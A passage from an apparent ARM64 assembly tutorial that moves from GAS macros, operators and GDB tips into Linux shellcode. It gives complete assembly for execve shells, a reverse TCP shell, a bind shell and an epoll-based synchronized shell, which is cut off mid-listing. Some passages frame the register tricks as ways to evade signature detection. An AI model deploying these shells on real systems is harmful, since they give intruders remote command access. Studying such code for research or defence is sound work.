If we have to manually define the size of each field in the structure, it seems the .structdirective is of little use. Consider using the #define keyword and preprocessing the file before assembling.

#define dimension_t.x 0
#define dimension_t.y 4
#define dimension_t.size 8

For a union, it doesn’t get any better than what I suggest be used for structures. We can use the .set or .equ directives or refer back to a combination of using #define and cpp. Support for both unions and structures in GAS leaves a lot to be desired.

3.5 Operators

From time to time I’ll see some mention of “polymorphic” shellcodes where the author attempts to hide or obfuscate strings using simple arithmetic or bitwise operations. Usually the obfuscation is done via a bit rotation or exclusive-OR and this presumably helps evade detection by some security products.

Operators are arithmetic functions, like + or %. Prefix operators take one argument. Infix operators take two arguments, one on either side. Operators have precedence, but operations with equal precedence are performed left to right.

Precedence Operators
Highest Mutiplication (*), Division (/), Remainder (%), Shift Left (<<), Right Shift (>>).
Intermediate Bitwise inclusive-OR (|), Bitwise And (&), Bitwise Exclusive-OR (^), Bitwise Or Not (!).
Low Addition (+), Subtraction (-), Equal To (==), Not Equal To (!=), Less Than (<), Greater Than (>), Greater Than Or Equal To (>=), Less than Or Equal To (<=).
Lowest Logical And (&&). Logical Or (||).

The following examples show a number of ways to use operators prior to assembly. These examples just load the immediate value 0x12345678 into the w0 register.

   // exclusive-OR
    movz    w0, 0x5678 ^ 0x4823
    movk    w0, 0x1234 ^ 0x5412
    movz    w1, 0x4823
    movk    w1, 0x5412, lsl 16
    eor     w0, w0, w1

    // rotate a value left by 5 bits using MOVZ/MOVK
    movz    w0,  (0x12345678 << 5)        |  (0x12345678 >> (32-5)) & 0xFFFF
    movk    w0, ((0x12345678 << 5) >> 16) | ((0x12345678 >> (32-5)) >> 16) & 0xFFFF, lsl 16
    // then rotate right by 5 to obtain original value
    ror     w0, w0, 5

    // right rotate using LDR
    .equ    ROT, 5

    ldr     w0, =(0x12345678 << ROT) | (0x12345678 >> (32 - ROT)) & 0xFFFFFFFF
    ror     w0, w0, ROT

    // bitwise NOT
    ldr     w0, =~0x12345678
    mvn     w0, w0

    // negation
    ldr     w0, =-0x12345678
    neg     w0, w0
    

3.6 Macros

If we need to repeat a number of assembly instructions, but with different parameters, using macros can be helpful. For example, you might want to eliminate branches in a loop to make code faster. Let’s say you want to load a 32-bit immediate value into a register. ARM instruction encodings are all 32-bits, so it isn’t possible to load anything more than a 16-bit immediate. Some immediate values can be stored in the literal pool and loaded using LDR, but if we use just MOV instructions, here’s how to load the 32-bit number 0x12345678 into register w0.

  movz    w0, 0x5678
  movk    w0, 0x1234, lsl 16

The first instruction MOVZ loads 0x5678 into w0, zero extending to 32-bits. MOVK loads 0x1234 into the upper 16-bits using a shift, while preserving the lower 16-bits. Some assemblers provide a pseudo-instruction called MOVL that expands into the two instructions above. However, the GNU Assembler doesn’t recognize it, so here are two macros for GAS that can load a 32-bit or 64-bit immediate value into a general purpose register.

  // load a 64-bit immediate using MOV
  .macro movq Xn, imm
      movz    \Xn,  \imm & 0xFFFF
      movk    \Xn, (\imm >> 16) & 0xFFFF, lsl 16
      movk    \Xn, (\imm >> 32) & 0xFFFF, lsl 32
      movk    \Xn, (\imm >> 48) & 0xFFFF, lsl 48
  .endm

  // load a 32-bit immediate using MOV
  .macro movl Wn, imm
      movz    \Wn,  \imm & 0xFFFF
      movk    \Wn, (\imm >> 16) & 0xFFFF, lsl 16
  .endm

Then if we need to load a 32-bit immediate value, we do the following.

  movl    w0, 0x12345678

Here are two more that imitate the PUSH and POP instructions. Of course, this only supports a single register, so you might want to write your own.

  // imitate a push operation
  .macro push Rn:req
      str     \Rn, [sp, -16]
  .endm

  // imitate a pop operation
  .macro pop Rn:req
      ldr     \Rn, [sp], 16
  .endm

3.7 Conditional assembly

Like the GNU C compiler, GAS provides support for if-else preprocessor directives. The following shows an example in C.

    #ifdef BIND
      // compile code to bind
    #else
      // compile code to connect
    #endif

Next, an example for GAS.

   .ifdef BIND
      // assemble code to bind
    .else
      // assemble code for connect
    .endif

GAS also supports something similar to the #ifndef directive in C.

    .ifnotdef BIND
      // assemble code for connect
    .else
      // assemble code for bind
    .endif

3.8 Comments

These are ignored by the assembler. Intended to provide an explanation for what code does. C style comments /* */ or C++ style // are a good choice. Ampersand (@) and hash (#) are also valid, however, you should know that when using the preprocessor on an assembly source code, comments that start with the hash symbol can be problematic. I tend to use C++ style for single line comments and C style for comment blocks.

  # This is a comment

  // This is a comment

  /*
    This is a comment
  */

  @ This is a comment.

4. GNU Debugger

Sometimes it’s necessary to closely monitor the execution of code to find the location of a bug. This is normally accomplished via breakpoints and single-stepping through each instruction.

4.1 Layout

There are various front ends for GDB that are intended to enhance debugging. Personally I don’t use GDB enough to be familiar with any of them. The setup I have is simply a split layout that shows disassembly and registers. This has worked well enough for what I need writing these simple codes, but you may want to experiment with the front ends. The following screenshot is what a split layout looks like.

To setup a split layout, save the following to $HOME/.gdbinit

layout split
layout regs

4.2 Commands

The following are a number of commands I’ve found useful for writing code.

Command Description
stepi Step into instruction.
nexti Step over instruction. (skips calls to subroutines)
set follow-fork-mode child Debug child process.
set follow-fork-mode parent Debug parent process.
layout split Display the source, assembly, and command windows.
layout regs Display registers window.
break <address> Set a breakpoint on address.
refresh Refresh the screen layout.
tty [device] Specifies the terminal device to be used for the debugged process.
continue Continue with execution.
run Run program from start.
define Combine commands into single user-defined command.

During execution of code, the window may become unstable. One way around this is to use the ‘refresh’ command, however, that probably only corrects it once. You can use the ‘define’ command to combine multiple commands into one macro.

(gdb) define stepx
Type commands for definition of "stepx".
End with a line saying just "end".
>stepi
>refresh
>end
(gdb) 

This works, but it’s not ideal. The screen will still bump. The best workaround I could find is to create a new terminal window. Obtain the TTY and use this in GDB. e.g. tty /dev/pts/1

5. Common Operations

Initializing or checking the contents of a register are very common operations in any assembly language. Knowing multiple ways to perform these actions can potentially help evade signature detection tools. What I show here isn’t an extensive list of ways by any means because there are umpteen ways to perform any operation, it just depends on how many instructions you wish to use.

5.1 Saving Registers

We can freely use 19 registers without having to preserve them for the caller. Compare this with x86 where only 3 registers are available or 5 for AMD64. One minor annoyance with ARM is calling subroutines. Unlike INTEL CPUs, ARM doesn’t store a return address on the stack. It stores the return address in the Link Register (LR) which is an alias for the x30 register. A callee is expected to save LR/x30 if it calls a subroutine. Not doing so will cause problems. If you migrate from ARM32, you’ll miss the convenience of push and popto save registers. These instructions have been deprecated in favour of load and store instructions, so we need to use STR/STP to save and LDR/LDP to restore. Here’s how you can save/restore registers using the stack.

    // push {x0}
    // [base - 16] = x0
    // base = base - 16
    str    x0, [sp, -16]!

    // pop {x0}
    // x0 = [base]
    // base = base + 16
    ldr    x0, [sp], 16

    // push {x0, x1}
    stp    x0, x1, [sp, -16]!

    // pop {x0, x1}
    ldp    x0, x1, [sp], 16

You might be wondering why 16 is used to store one register. The stack must always be aligned by 16 bytes. Unaligned access can cause exceptions.

5.2 Copying Registers

The first example here is the “normal” way and the rest are a few alternatives.

    // Move x1 to x0
    mov     x0, x1

    // Extract bits 0-63 from x1 and store in x0 zero extended.
    ubfx   x0, x1, 0, 63

    // x0 = (x1 & ~0)
    bic    x0, x1, xzr

    // x0 = x1 >> 0
    lsr    x0, x1, 0

    // Use a circular shift (rotate) to move x1 to x0
    ror    x0, x1, 0
    
    // Extract bits 0-63 from x1 and insert into x0
    bfxil  x0, x1, 0, 63

5.3 Initialize register to zero.

Normally to initialize a counter “i = 0” or pass NULL/0 to a system call. Each one of these instructions will do that.

    // Move an immediate value of zero into the register.
    mov    x0, 0

    // Copy the zero register.
    mov    x0, xzr

    // Exclusive-OR the register with itself.
    eor    x0, x0, x0

    // Subtract the register from itself.
    sub    x0, x0, x0

    // Mask the register with zero register using a bitwise AND.
    // An immediate value of zero will work here too.
    and    x0, x0, xzr

    // Multiply the register by the zero register.
    mul    x0, x0, xzr

    // Extract 64 bits from xzr and place in x0.
    bfxil  x0, xzr, 0, 63
    
    // Circular shift (rotate) right.
    ror    x0, xzr, 0

    // Logical shift right.
    lsr    x0, xzr, 0
    
    // Reverse bytes of zero register.
    rev    x0, xzr

5.4 Initialize register to 1.

Rarely does a counter start at 1, but it’s common enough passing to a system call.

    // Move 1 into x0.
    mov     x0, 1

    // Compare x0 with x0 and set x0 if equal.
    cmp     x0, x0
    cset    x0, eq

    // Bitwise NOT the zero register and store in x0. Negate x0.
    mvn     x0, xzr
    neg     x0, x0

5.5 Initialize register to -1.

Some system calls require this value.

    // move -1 into register
    mov     x0, -1

    // copy the zero register inverted
    mvn     x0, xzr

    // x0 = ~(x0 ^ x0)
    eon     x0, x0, x0

    // x0 = (x0 | ~xzr)
    orn     x0, x0, xzr

    // x0 = (int)0xFF
    mov     w0, 255
    sxtb    x0, w0

    // x0 = (x0 == x0) ? -1 : x0
    cmp     x0, x0
    csetm   x0, eq

5.6 Initialize register to 0x80000000.

This might seem vague now, but an algorithm like X25519 uses this value for its reduction step.

    mov     w0, 0x80000000

    // Set bit 31 of w0.
    mov     w0, 1
    mov     w0, w0, lsl 31

    // Set bit 31 of w0.
    mov     w0, 1
    ror     w0, w0, 1

    // Set bit 31 of w0.
    mov     w0, 1
    rbit    w0, w0

    // Set bit 31 of w0.
    eon     w0, w0, w0
    lsr     w0, w0, 1
    add     w0, w0, 1
    
    // Set bit 31 of w0.
    mov     w0, -1
    extr    w0, w0, wzr, 1

5.7 Testing for 1/TRUE.

A function returning TRUE normally indicates success, so these are some ways to test for that.

    // Compare x0 with 1, branch if equal.
    cmp     x0, 1
    beq     true

    // Compare x0 with zero register, branch if not equal.
    cmp     x0, xzr
    bne     true
    
    // Subtract 1 from x0 and set flags. Branch if equal. (Z flag is set)
    subs    x0, x0, 1
    beq     true

    // Negate x0 and set flags. Branch if x0 is negative.
    negs    x0, x0
    bmi     true

    // Conditional branch if x0 is not zero.
    cbnz    x0, true

    // Test bit 0 and branch if not zero.
    tbnz    x0, 0, true

5.8 Testing for 0/FALSE.

Normally we see a CMP instruction used in handwritten assembly code to evaluate this condition. This subtracts the source register from the destination register, sets the flags, and discards the result.

    // x0 == 0
    cmp     x0, 0
    beq     false

    // x0 == 0
    cmp     x0, xzr
    beq     false

    ands    x0, x0, x0
    beq     false

    // same as ANDS, but discards result
    tst     x0, x0
    beq     false

    // x0 == -0
    negs    x0
    beq     false

    // (x0 - 1) == -1
    subs    x0, x0, 1
    bmi     false

    // if (!x0) goto false
    cbz     x0, false

    // if (!x0) goto false
    tbz     x0, 0, false

5.9 Testing for -1

Some functions will return a negative number like -1 to indicate failure. CMN is used in the first example. This behaves exactly like CMP, except it is adding the source value (register or immediate) to the destination register, setting the flags and discarding the result.

    // w0 == -1
    cmn     w0, 1
    beq     failed

    // w0 == 0
    cmn     w0, wzr
    bmi     failed

    // negative?
    ands    w0, w0, w0
    bmi     failed

    // same as AND, but discards result
    tst     w0, w0
    bmi     failed

    // w0 & 0x80000000
    tbz     w0, 31, failed

6. Linux Shellcode

Developing an operating system, writing boot code, reverse engineering or exploiting vulnerabilities; these are all valid reasons to learn assembly language. In the case of exploiting bugs, one needs to have a grasp of writing shellcodes. These are compact position independent codes that use system calls to interact with the operating system.

6.1 System Calls

System calls are a bridge between the user and kernel space running at a higher privileged level. Each call has its own unique number that is essentially an index into an array of function pointers located in the kernel. Whether you want to write to a file on disk, send and receive data over the network or just print a message to the screen, all of this must be performed via system calls at some point.

A full list of calls can be found in the Linux source tree on github here, but if you’re already logged into a Linux system running on ARM64, you might find a list in /usr/include/asm-generic/unistd.h too. Here are a few to save you time looking up.

  // Linux/AArch64 system calls
  .equ SYS_epoll_create1,   20
  .equ SYS_epoll_ctl,       21
  .equ SYS_epoll_pwait,     22
  .equ SYS_dup3,            24
  .equ SYS_fcntl,           25
  .equ SYS_statfs,          43
  .equ SYS_faccessat,       48
  .equ SYS_chroot,          51
  .equ SYS_fchmodat,        53
  .equ SYS_openat,          56
  .equ SYS_close,           57
  .equ SYS_pipe2,           59
  .equ SYS_read,            63
  .equ SYS_write,           64
  .equ SYS_pselect6,        72
  .equ SYS_ppoll,           73
  .equ SYS_splice,          76
  .equ SYS_exit,            93
  .equ SYS_futex,           98
  .equ SYS_kill,           129
  .equ SYS_reboot,         142
  .equ SYS_setuid,         146
  .equ SYS_setsid,         157
  .equ SYS_uname,          160
  .equ SYS_getpid,         172
  .equ SYS_getppid,        173
  .equ SYS_getuid,         174
  .equ SYS_getgid,         176
  .equ SYS_gettid,         178
  .equ SYS_socket,         198
  .equ SYS_bind,           200
  .equ SYS_listen,         201
  .equ SYS_accept,         202
  .equ SYS_connect,        203
  .equ SYS_sendto,         206
  .equ SYS_recvfrom,       207
  .equ SYS_setsockopt,     208
  .equ SYS_getsockopt,     209
  .equ SYS_shutdown,       210
  .equ SYS_munmap,         215
  .equ SYS_clone,          220
  .equ SYS_execve,         221
  .equ SYS_mmap,           222
  .equ SYS_mprotect,       226
  .equ SYS_wait4,          260
  .equ SYS_getrandom,      278
  .equ SYS_memfd_create,   279
  .equ SYS_access,        1033

All registers except those required to return values are preserved. System calls return results in x0 while everything else remains the same, including the conditional flags. In the shellcode, only immediate values and stack are used for strings. This is the approach I recommend because it allows manipulation of the string before it’s stored on the stack. Using LDR and the literal pool is a good alternative.

6.2 Tracing

“strace” is a diagnostic and debugging utility for Linux can show problems in your code. It will show what system calls are implemented by the kernel and which ones are simply wrapper functions in GLIBC. As I found out while writing some of the shellcodes, there is no dup2pipe, or fork system calls. There are only wrapper functions in GLIBC that call dup3pipe2 and clone.

6.3 Executing a shell.

// 40 bytes

    .arch armv8-a

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", NULL, NULL);
    mov    x8, SYS_execve
    mov    x2, xzr           // NULL
    mov    x1, xzr           // NULL
    movq   x3, BINSH         // "/bin/sh"
    str    x3, [sp, -16]!    // stores string on stack
    mov    x0, sp
    svc    0

6.4 Executing a command.

Executing a command can be a good replacement for a reverse connecting or bind shell because if a system can execute netcat, ncat, wget, curl, GET then executing a command may be sufficient to compromise a system further. The following just echos “Hello, World!” to the console.

// 64 bytes

    .arch armv8-a
    .align 4

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    movq   x0, BINSH             // x0 = "/bin/sh\0"
    str    x0, [sp, -64]!
    mov    x0, sp
    mov    x1, 0x632D            // x1 = "-c"
    str    x1, [sp, 16]
    add    x1, sp, 16
    adr    x2, cmd               // x2 = cmd
    stp    x0, x1,  [sp, 32]     // store "-c", "/bin/sh"
    stp    x2, xzr, [sp, 48]     // store cmd, NULL
    mov    x2, xzr               // penv = NULL
    add    x1, sp, 32            // x1 = argv
    mov    x8, SYS_execve
    svc    0
cmd:
    .asciz "echo Hello, World!"

6.5 Reverse connecting shell over TCP.

The reverse shell makes an outgoing connection to a remote host and upon connection will spawn a shell that accepts input. Rather than use PC-relative instructions, the network address structure is initialized using immediate values.

// 120 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F // 127.0.0.1

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // connect(s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    mov     x2, 16
    movq    x1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp     // x1 = &sa 
    svc     0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     x2, xzr
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.6 Bind shell over TCP.

Pretty much the same as the reverse shell except we listen for incoming connections using three separate system calls. bindlistenaccept are used in place of connect. This could easily be updated to include connect using the conditional assembly discussed before.

// 148 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // bind(s, &sa, sizeof(sa));  
    mov     x8, SYS_bind
    mov     x2, 16
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    svc     0

    // listen(s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    mov     w0, w3
    svc     0

    // r = accept(s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    mov     w0, w3
    svc     0

    mov     w3, w0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.7 Synchronized shell

“And now for something completely different.”

There’s nothing wrong with the bind or reverse shells mentioned. They work fine. However, it’s not possible to manipulate the incoming or outgoing streams of data, so there isn’t any confidentiality provided between two systems. To solve this we use sychronization. Most POSIX systems offer the select function for this purpose. It allows one to monitor I/O of file descriptors. However, select is limited in how many descriptors it can monitor in a single process. For that reason, kqueue on BSD and epoll on Linux were developed as they are unaffected the same limitations.

#define _GNU_SOURCE

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sched.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(void) {
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                fd, in[2], out[2];
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};
    pid_t              ctid, pid;
 
    // create pipes for redirection of stdin/stdout/stderr
    pipe2(in, 0);
    pipe2(out, 0);

    // fork process
    ctid = syscall(SYS_gettid);
    
    pid  = syscall(SYS_clone, 
        CLONE_CHILD_SETTID   | 
        CLONE_CHILD_CLEARTID | 
        SIGCHLD, 0, NULL, 0, &ctid);

    // if child process
    if (pid == 0) {
      // assign read end to stdin
      dup3(in[0],  STDIN_FILENO,  0);
      // assign write end to stdout   
      dup3(out[1], STDOUT_FILENO, 0);
      // assign write end to stderr  
      dup3(out[1], STDERR_FILENO, 0);  
      
      // close pipes
      close(in[0]);  close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r = accept(s, 0, 0);
        s2 = s; s = r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r = connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if (r >= 0) {
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;) {
          r = epoll_pwait(efd, &evts, 1, -1, NULL);
                  
          // error? bail out           
          if (r < 0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
          // assign socket or read end of output
          r = (fd == s) ? s     : out[0];
          // assign socket or write end of input
          w = (fd == s) ? in[1] : s;

          // read from socket or stdout        
          len = read(r, buf, BUFSIZ);

          if (!len) break;
          
          // encrypt/decrypt data here
          
          // write to socket or stdin        
          write(w, buf, len);        
        }      
        // remove 2 descriptors 
        epoll_ctl(efd, EPOLL_CTL_DEL, s, NULL);                  
        epoll_ctl(efd, EPOLL_CTL_DEL, out[0], NULL);                  
        close(efd);
      }
      // shutdown socket
      shutdown(s, SHUT_RDWR);
      close(s);
      #ifdef BIND
        close(s2);
      #endif
      // terminate shell      
      kill(pid, SIGCHLD);            
    }
    close(in[1]);
    close(out[0]);
    return 0; 
}

Let’s see how some of these calls were implemented using the A64 set. First, replacing the standard I/O handles with pipe descriptors.

  // assign read end to stdin
  dup3(in[0],  STDIN_FILENO,  0);
  // assign write end to stdout   
  dup3(out[1], STDOUT_FILENO, 0);
  // assign write end to stderr  
  dup3(out[1], STDERR_FILENO, 0);  

The write end of out is assigned to stdout and stderr while the read end of in is assigned to stdin. We can perform this with the following.

    mov     x8, SYS_dup3
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, in0]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

    add     x1, x1, 1
    ldr     w0, [sp, out1]
    svc     0

Eleven instructions or 44 bytes are used for this. If we want to save a few bytes, we could use a loop instead. The value of STDIN_FILENO is conveniently zero and STDERR_FILENO is 2. We can simply loop from 0 to 3 and use a ternary operator to choose the correct descriptor.

  for (i=0; i<3; i++) {
    dup3(i==0 ? in[0] : out[1], i, 0);
  }

To perform the same operation in assembly, we can use the CSEL instruction.

    mov     x8, SYS_dup3
    mov     x1, (STDERR_FILENO + 1) // x1 = 3
    mov     x2, xzr                 // x2 = 0
    ldp     w4, w3, [sp, out1]      // w4 = out[1], w3 = in[0]
c_dup:
    subs    x1, x1, 1               // 
    csel    w0, w3, w4, eq          // w0 = (x1==0) ? in[0] : out[1]
    svc     0
    cbnz    x1, c_dup
    

Using a loop in place of what we orginally had, we remove three instructions and save a total of twelve bytes. A similar operation can be implemented for closing the pipe handles. In the C code, it simply closes each one in separate statements like so.

  // close pipes
  close(in[0]);  close(in[1]);
  close(out[0]); close(out[1]);

For the assembly code, a loop is used instead. Six instructions are used instead of eight.

    mov     x1, 4*4          // i = 4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4        // i--
    ldr     w0, [sp, x1]     // w0 = pipes[i]
    svc     0
    cbnz    x1, cls_pipe     // while (i != 0)

The epoll_pwait system call is used instead of the pselect6 system call to monitor file descriptors. Before calling epoll_pwait we must create an epoll file descriptor using epoll_create1 and add descriptors to it using epoll_ctl. The following code does that once a connection to remote peer has been established.

  // add 2 descriptors to monitor stdout and socket
  for (i=0; i<2; i++) {
    fd = (i==0) ? s : out[0];
    evts.data.fd = fd;
    evts.events  = EPOLLIN;
  
    epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
  }

All registers including the process state are preserved across system calls. So we could implement the above code using the following assembly code.

    mov     x8, SYS_epoll_ctl
    add     x3, sp, evts       // x3 = &evts
    mov     x1, EPOLL_CTL_ADD  // x1 = EPOLL_CTL_ADD
    mov     x4, EPOLLIN

    ldr     w2, [sp, s]        // w2 = s
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

    ldr     w2, [sp, out0]     // w2 = out[0]
    stp     x4, x2, [sp, evts]
    ldr     w0, [sp, efd]      // w0 = efd
    svc     0

Twelve instructions used here or forty-eight bytes. Using a loop, let’s see if we can save more space. Some of you may have noticed both EPOLL_CTL_ADD and EPOLLIN are 1. We can save 4 bytes with the following.

    // epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
    ldr     w2, [sp, s]
    ldr     w4, [sp, out0]
poll_init:
    mov     x8, SYS_epoll_ctl
    mov     x1, EPOLL_CTL_ADD
    add     x3, sp, evts
    stp     x1, x2, [x3]
    ldr     w0, [sp, efd]
    svc     0
    cmp     w2, w4
    mov     w2, w4
    bne     poll_init

The value returned by the epoll_pwait system call must be checked before continuing to process the events structure. If successful, it will return the number of file descriptors that were signalled while -1 will indicate an error.

  r = epoll_pwait(efd, &evts, 1, -1, NULL);
          
  // error? bail out           
  if (r < 0) break;

Recall in the Common Operations section where we test for -1. One could use the following assembly code.

    tst     x0, x0
    bl      cls_efd

A64 provides a conditional branch opcode that allows us to execute the IF statement in one instruction.

    tbnz    x0, 31, cls_efd

After this check, we then need to determine if the signal was the result of input. We are only monitoring for input to a read end of pipe and socket. Every other event would indicate an error.

  // not input? bail out
  if (!(evts.events & EPOLLIN)) break;

  fd = evts.data.fd;

The value of EPOLLIN is 1, and we only want those type of events. By masking the value of events with 1 using a bitwise AND, if the result is zero, then the peer has disconnected. Load pair is used to load both the events and data_fd values simultaneously.

    // x0 = evts.events, x1 = evts.data.fd
    ldp     x0, x1, [sp, evts]

    // if (!(evts.events & EPOLLIN)) break;
    tbz     w0, 0, cls_efd

Our code will read from either out[0] or s.

  // assign socket or read end of output
  r = (fd == s) ? s     : out[0];
  // assign socket or write end of input
  w = (fd == s) ? in[1] : s;

Using the highly useful conditional select instruction, we can select the correct descriptors to read and write to.

    // w3 = s
    ldr     w3, [sp, s]
    // w5 = in[1], w4 = out[0]
    ldp     w5, w4, [sp, in1]

    // fd == s
    cmp     w1, w3

    // r = (fd == s) ? s : out[0];
    csel    w0, w3, w4, eq

    // w = (fd == s) ? in[1] : s;
    csel    w3, w5, w3, eq

The final assembly code for the synchronized shell follows.

    .arch armv8-a
    .align 4

    // default TCP port
    .equ PORT, 1234

    // default host, 127.0.0.1
    .equ HOST, 0x0100007F

    // comment out for a reverse connecting shell
    .equ BIND, 1

    // comment out for code to behave as a function
    .equ EXIT, 1

    .include "include.inc"

    // structure for stack variables

          .struct 0
    p_in: .skip 8
          .equ in0, p_in + 0
          .equ in1, p_in + 4

    p_out:.skip 8
          .equ out0, p_out + 0
          .equ out1, p_out + 4

    id:   .skip 8
    efd:  .skip 4
    s:    .skip 4

    .ifdef BIND
    s2:   .skip 8
    .endif

    evts: .skip 16
          .equ events, evts + 0
          .equ data_fd,evts + 8

    buf:  .skip BUFSIZ
    ds_tbl_size:

    .global _start
    .text
_start:
    // allocate memory for variables
    // ensure data structure aligned by 16 bytes
    sub     sp, sp, (ds_tbl_size & -16) + 16

    // create pipes for stdin
    // pipe2(in, 0);
    mov     x8, SYS_pipe2
    mov     x1, xzr
    add     x0, sp, p_in
    svc     0

    // create pipes for stdout + stderr
    // pipe2(out, 0);
    add     x0, sp, p_out
    svc     0

    // syscall(SYS_gettid);
    mov     x8, SYS_gettid
    svc     0
    str     w0, [sp, id]

    // clone(CLONE_CHILD_SETTID   | 
    //       CLONE_CHILD_CLEARTID | 
    //       SIGCHLD, 0, NULL, NULL, &ctid)
    mov     x8, SYS_clone
    add     x4, sp, id           // ctid
    mov     x3, xzr              // newtls
    mov     x2, xzr              // ptid
    movl    x0, (CLONE_CHILD_SETTID + CLONE_CHILD_CLEARTID + SIGCHLD)
    svc     0
    str     w0, [sp, id]         // save id
    cbnz    w0, opn_con          // if already forked?
                                 // open connection
    // in this order..
    //
    // dup3 (out[1], STDERR_FILENO, 0);
    // dup3 (out[1], STDOUT_FILENO, 0);
    // dup3 (in[0],  STDIN_FILENO , 0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
    ldr     w3, [sp, in0]
    ldr     w4, [sp, out1]
c_dup:
    subs    x1, x1, 1
    // w0 = (x1 == 0) ? in[0] : out[1];
    csel    w0, w3, w4, eq
    svc     0
    cbnz    x1, c_dup

    // close pipe handles in this order..
    //
    // close(in[0]);
    // close(in[1]);
    // close(out[0]);
    // close(out[1]);
    mov     x1, 4*4
    mov     x8, SYS_close
cls_pipe:
    sub     x1, x1, 4
    ldr     w0, [sp, x1]
    svc     0
    cbnz    x1, cls_pipe

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp, -16]!
    mov     x0, sp
    svc     0
opn_con:
    // close(in[0]);
    mov     x8, SYS_close
    ldr     w0, [sp, in0]
    svc     0

    // close(out[1]);
    ldr     w0, [sp, out1]
    svc     0

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     x2, 16      // x2 = sizeof(sin)
    str     w0, [sp, s] // w0 = s
.ifdef BIND
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    // bind (s, &sa, sizeof(sa));
    mov     x8, SYS_bind
    svc     0
    add     sp, sp, 16
    cbnz    x0, cls_sck  // if(x0 != 0) goto cls_sck

    // listen (s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    ldr     w0, [sp, s]
    svc     0

    // accept (s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    ldr     w0, [sp, s]
    svc     0

    ldr     w1, [sp, s]      // load binding socket
    stp     w0, w1, [sp, s]
    mov     x0, xzr
.else
    movq    x1, ((HOST << 32) | (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET))
    str     x1, [sp, -16]!
    mov     x1, sp
    // connect (s, &sa, sizeof(sa));
